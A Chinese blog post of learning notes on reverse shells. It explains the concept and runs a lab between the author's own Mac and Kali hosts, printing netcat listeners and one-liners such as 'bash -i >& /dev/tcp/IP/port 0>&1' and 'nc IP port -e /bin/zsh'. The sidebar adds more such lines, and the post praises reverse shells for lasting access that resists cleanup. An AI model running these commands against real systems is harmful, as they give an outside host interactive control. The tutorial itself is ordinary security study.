【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1

已于 2022-03-15 21:25:35 修改
阅读量8.8k 收藏 16
点赞数 5
分类专栏: 学习笔记 渗透笔记 笔记 文章标签: 学习 linux bash macos web安全
于 2022-03-15 19:54:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37092496/article/details/123510433
版权

文章目录

前言

为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯)

作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1

更容易阅读的版本在这里,点击传送

常用的反弹shell命令:
bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1

何为shell

Shell 脚本(shell script),是一种为 shell 编写的脚本程序。

如何执行

有一个能编写代码的文本编辑器和一个能解释执行的脚本解释器就可以执行

shell种类

linux

Bourne Shell/usr/bin/sh或/bin/sh)
Bourne Again Shell/bin/bash)
C Shell/usr/bin/csh)
K Shell/usr/bin/ksh)
Shell for Root/sbin/sh)..

Mac

bash
zsh
..

Windows

PowerShell
Cmd
..

bash与sh

bash对sh兼容,是各种Linux发行版标准配置的Shell

何为反弹shell:

:::tip

  • 让靶机主动执行连接我们本地机器的命令
  • 优点:
  • 靶机更换ip后依然不会丢失权限
  • 连接方便、操作简单
  • 相较于传统后门不易被清理等优势;
    :::

正向shell

可以理解为q1给q2打电话,q2接电话,完成信息接通

反弹shell

可以理解为q1给q2打电话,q2把q1的电话号码保存下来,然后重新呼叫了q1

linux反弹shell

nc(NetCat)

可实现任意TCP/UDP端口的侦听

安装nc(发行版linux默认已安装)

命令:

yum install nc -y

使用方法

nc -lvp 4444 
# -lvp (l监听v输出p端口)

实战

靶机执行:

bash -i >& /dev/tcp/192.168.0.10/4444 0>&1
# bash -i  启动交互式命令bash 
# -i       将输出重定向到文件
# /dev/tcp 靶机为Linux的设备/dev/tcp连接程序启动socket(Linux系统:所有程序都是目录文件)
# 192.168.0.10/4444 连接的ip和端口(即本地计算机)
# 0>&1     远程的输入和输出(消息呈现方式为远程)
命令解释
bash -i启动交互式命令bash
-i将输出重定向到文件
/dev/tcp靶机为Linux的设备/dev/tcp连接程序启动socket(Linux系统:所有程序都是目录文件)
192.168.0.10/4444连接的ip和端口(即本地计算机)
0>&1远程的输入和输出(消息呈现方式为远程)

实战时注意

:::warning
Mac监听端没有nc -lvp port此命令 只有nc -lv port
:::

实战中,我拿Mac和kali-linux进行测试

查看Mac和Linux的ip命令:

sudo su
ifconfig

kali的ip:10.211.55.4
kali的ip:10.211.55.4Mac的ip:10.37.129.2
Mac的ip:10.37.129.2

正向连接- Mac连接kali

1.kali启动监听:(先启动监听,否则拒绝连接)

sudo su
nc -lv 7777

在这里插入图片描述
Mac执行:

sudo su
zsh -i > /dev/tcp/mac监听ip/mac监听端口
(ls,pwd,whoami,cd /tmp,)

在这里插入图片描述
此时Mac终端执行者已经变为kali的root用户

尝试发送信息(Mac->kali)

whoami

在这里插入图片描述kali机:监听端口并且实时回显信息
在这里插入图片描述尝试在kali上执行命令

pwd

在这里插入图片描述

在这里插入图片描述
可以看到Mac上并无信息

因为此时为单方通信,即Mac的信息呈现在kali

反弹shell

shell:Mac->(攻击)kali

Mac开启监听

nc -lv 7777

在这里插入图片描述
kali开启shell

nc 10.211.55.2(Mac:ip) 7777 -e /bin/zsh(zsh或者bash)

ps:模拟渗透测试时通过某个途径将shell命令发送到了kali机器并成功执行

在这里插入图片描述
此时在Mac(攻击机)上执行命令:

whoami

在这里插入图片描述
可以看到Mac机成功执行命令,并且反弹回相关信息

再看看kali机
在这里插入图片描述

并无任何显示

反弹shell:linux——>(攻击)kali
kali开启监听

nc -lvnp 7777

在这里插入图片描述

Mac被攻击,执行了shell命令:

bash -i >& /dev/tcp/10.211.55.4(kali)/7777 0>&1

在这里插入图片描述
此时kali已经有回显信息了,并且连接成功为bash
在这里插入图片描述
在kali上执行命令,成功回显
在这里插入图片描述
Mac不能执行主动终结命令,权限属于kali机

以上就是我对反弹shell的理解和感受,欢迎留言
写作耗时约2h@(。・o・)@

阅读更多(๑•̀ㅂ•́)و✧Fighting

  1. https://blog.csdn.net/qq_37092496/article/details/122931617 ↩︎

爬虫数据分析师
关注
  • 5
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
bash-study:shell学习笔记
05-09
BASH STUDY 这个项目目的在于学习 bash. #说明 由于初学shell,所以进程管理和系统级shell 没有记录。 #历史 2014.3,读了 《学习 bash》第二版。 2014.3.14,建立目录框架 2014.3.28,增加了 awk,windows bat, python 脚本。 目录 实战 1、批量替换指定文件的指定内容 涉及知识点:基础语法、grep 数据搜索、awk 数据提取、sed 数据修改。 # 当然, grep 可以直接得到文件名的,这里作为演戏,先得到默认的匹配内容,然后使用awk处理得到文件名 for l in $(grep -r res.tiankonguse . | grep "res.tiankonguse.com/images/2019/0[1-8]") do f=$(echo $l | awk -F: '{print $1}')
Linux shell 编程学习笔记
01-07
一直以来都很像系统的学习一下 shell 脚本,以便方便的高效的管理服务器。 这次难得有时间和条件来学习,所以做好笔记。 一:shell 能做什么  二:shell 脚本的几种执行方式,我们创建文件 start.sh,并且赋予 执行权限 chomd +x start.sh #然后可以通过以下命令执行 #相对路径,或者绝对路径 ./start.sh #一个脚本范例,&& 表示的是逻辑判断,表示前面执行成功才会执行 #当然也可以用分号,但是不代表逻辑判断,前面执行成功与否都会执行 # || 代表逻辑否,就是前面失败执行 ping -c1 8.8.8.8 && echo the networ
learn-bash-shell-script:学习BASH Shell脚本
04-02
学习bash-shell-script 学习BASH Shell脚本
shell脚本执行jps时:-bash: jps: command not found
01-20
我构建了hadoop集群。我们一定会写一个shell脚本去每一个节点上去jps,查看每个节点的进程情况。 原先以为shell很简单: #!/bin/bash #查看每个节点运行情况 for((host=101;host<108;host++));do echo -----------hadoop$host------------- ssh hadoop$host jps done 这里默认服务器节点的名字是hadoop101-hadoop107 默认已经配置了ssh_key的公钥和私钥 看是运行这段程序的时候会弹出一个错误: -bash: jps: command not found
shell脚本学习笔记–基础(1)
01-09
shell脚本学习笔记–基础(1)简介脚本注释脚本解释器脚本执行脚本调试基本符号和命令含义 简介 学习Shell脚本之前,我们有必要先来认识认识什么叫Shell?谈到这个问题,我们首先来回忆一下计算机自底向上的体系,最下层是硬件,上面是驱动,上面是操作系统,再上面是Shell,即所谓的外壳。 Shell其实是用户和操作系统进行人机互动的一个interface。主要通过命令行来使系统完成某种工作,因此Shell最简单的定义为—命令解释器:可以把用户的信息传递给操作系统,也可以把操作系统的处理结果翻译给用户。 最常用Shell:sh 、csh、bash等等。 脚本注释 在shell中使用 # 在
反弹shell bash -i命令
m0_37638874的博客
09-07 3561
这只是bash实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入host port参数,就能发起一个socket连接。复制格式有num1&num2,区别是,前者是以只读的形式打开,后者是以写的形式打开,这里两者均可。Linux系统中,把一切都看做是文件,当进程打开现有文件或创建新文件时,内核向进程返回一个文件描述符,,A先开启一个监听端口,让B去连接A的这个端口,连接成功后,A就能控制B了。是linux中的一个特殊设备,打开这个文件就相当于。
Linux常用命令
hangoer的博客
08-28 690
命令格式的说明 命令格式:命令 [-选项][参数] 参数 eg: [root@qianfeng01 ~]# ls -la /usr 说明: ⼤部分命令遵从该格式 多个选项时,可以⼀起写 eg: [root@qianfeng01 ~]# ls –l –a ls –la 简化选项与完整选项(注:并⾮所有选项都可使⽤完整选项) eg: [root@qianfeng01 ~]# ls –all ls –a 帮助命令:(相当于命令说明书) 帮助命令 man 英⽂:manual 命令路径:/usr/bin/man 执
反弹shell
soldi_er的博客
04-16 3117
文章目录反向连接的概念反向连接命令命令分析Linux符号知识本地测试实战记录参考 反向连接的概念   反弹shell,是指目标向服务器端口发起请求,发送目标shell命令行的输入输出,服务器通过监听端口来获得请求内容。reverse shell与telnet、ssh等标准shell对应,本质上是网络概念的客户端/服务端的角色反转。   为什么不正向连接?通常用于连接目标机器防火墙受限、权限不足、端口被占用等情形。正向连接,包括远程桌面、Web服务、ssh、Telnet等。 反向连接命令 命令分析   示例
花一天时间搞懂反弹shell命令bash -i & /dev/tcp/${HOST}/${PORT} 0&1!
最新发布
weixin_53306211的博客
10-28 925
【代码】花一天时间搞懂反弹shell命令
反弹shell--bash一句话解析
小刚的博客
01-10 2953
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 反弹shell解析bash反弹shell解析拆分语句了解一下交互式连接设备文件描述符合并输入输出大合并 bash反弹shell解析 最基础的反弹shell语句,这么久只会用,但不知道其中的奇妙之处 真是妙蛙种子被踢出了米奇妙妙屋。。。 bash -i >& /dev/tcp/192.168.1.1/8888 0>&1 拆分语句了解一下 交互式 bash -i是打开一个.
linux退出大于号界面命令,Linux编程 22 shell编程(输出和输入重定向,管道,数学运算命令,退出脚本状态码)...
weixin_28748867的博客
04-29 458
1. 输出重定向最基本的重定向是将命令的输出发送到一个文件中。在bash shell中用大于号(>) ,格式如下:command > inputfile。例如:将date命令的输出内容,保存到指定的输出文件中。如果文件已存在,重定向操作符会用新的文件数据覆盖已有文件。这种情况下可以用双大于号(>>) 来追加数据。如下图所示:2. 输入重定向输入重定向和输出重定向正好相反。输...
linux bash -,linux bash >&总结
weixin_42310347的博客
05-16 692
0x00前言经常接触到bash的>&符号,总是忘记或者混淆,特有此文总结。0x01概述0:stdin标准输入1:stdout标准输出2:stderr标准错误>:输出重定向/dev/null:空洞,可以理解为黑洞或垃圾箱直接ls>1系统会误认为是把标准输出重定向到1这个文件而不是标准输出,所以加上&1表示标准输出。标准错误2不仅显示错误信息,还有回显输入命令...
linux 运行动态链接程序报错,/bin/sh: ./<file: not found
深空深蓝的博客
10-20 935
错误现象 之前使用 qemu 搭建了 Linux 学习环境后,没关注到运行动态链接程序的问题。典型的错误日志如下: / # ./test_linux -/bin/sh: ./test_linux: not found 修复方法 上述问题出现的原因是动态加载器没找到,sh 程序首先会让内核执行 exec 程序加载待运行的程序,内核识别到是一个 elf 文件,并且发现是一个动态链接的程序,那么回去寻找动态加载器,如果找不到的话就会报上面的错误。通常动态加载器名称是 ld-linux-xxx。以 aarch64
selinux管理与应用
iteye_3782的博客
09-12 468
1.1 SElinux概述 SELinux(Security-Enhanced Linux) 是美国国家安全局(NAS)对于强制访问控 制的实现,在这种访问控制体系的限制下,进程只能访问那些在他的任务中所需要文件。大部分使用 SELinux 的人使用的都是SELinux就绪的发行版,例如 Fedora、Red Hat Enterprise Linux (RHEL)、Debian 或 Gentoo...
Airflow离线升级(1.10.0-2.2.3)文档
大数据_大龙
04-12 3376
Airflow离线升级(1.10.0->2.2.3)文档
进程异常行为-反弹Shell攻击,KILL多个进程
weixin_34198797的博客
06-28 446
进程异常行为-反弹Shell攻击 父进程名称:bash 进程名称:bash 进程名称:/usr/bin/bash 进程id:23,077 命令行参数:sh -c /bin/bash -i >& /dev/tcp/27.255.72.119/4451 0>&1 说明:黑客利用远程代码执行漏洞或者恶意木马向中控服务器建立反向TCP连接,连接建立后,黑客可利用该连...
Linux渗透之反弹Shell命令解析
deeplearnings的博客
08-18 9834
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 B
命令执行漏洞
qq_42307546的博客
01-20 1436
命令执行漏洞也称为rce,当应用调用一些外部程序就会用到一些系统命令的函数,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,就会造成命令执行漏洞 相关函数 system(args)有回显 passthru(args)有c exec(args)回显最后一行-必须echo输出 shell_exec()无回显必须输出 代码分析 <?php /** * Created by runner.han * There is nothing new under the sun */
Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)
热门推荐
yuguang的博客
11-17 1万+
目录 一.情况描述 1.漏洞描述 2.漏洞造成的影响 3.安全建议 4.技术参考 5.建设方案 6.漏洞证明 测试结果 二.springmvc修改 1.修改pom.xml配置 2.增加一个自定义秘钥代码 3.修改shiro配置 4.修改完之后测试 一.情况描述 1.漏洞描述 Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。 2.漏洞造成的影响 在配置了默认密钥的情况下,攻击者可以通过精心构造的 Payload 实现远.
hbase启动进程正常但hbase shell命令显示-bash: hbase: command not found
06-11
如果hbase启动进程正常,但是在终端中输入hbase shell命令时却提示`-bash: hbase: command not found`,可能是因为你没有将hbase的bin目录添加到系统环境变量中。 你可以尝试将hbase的bin目录添加到环境变量中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爬虫数据分析师

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值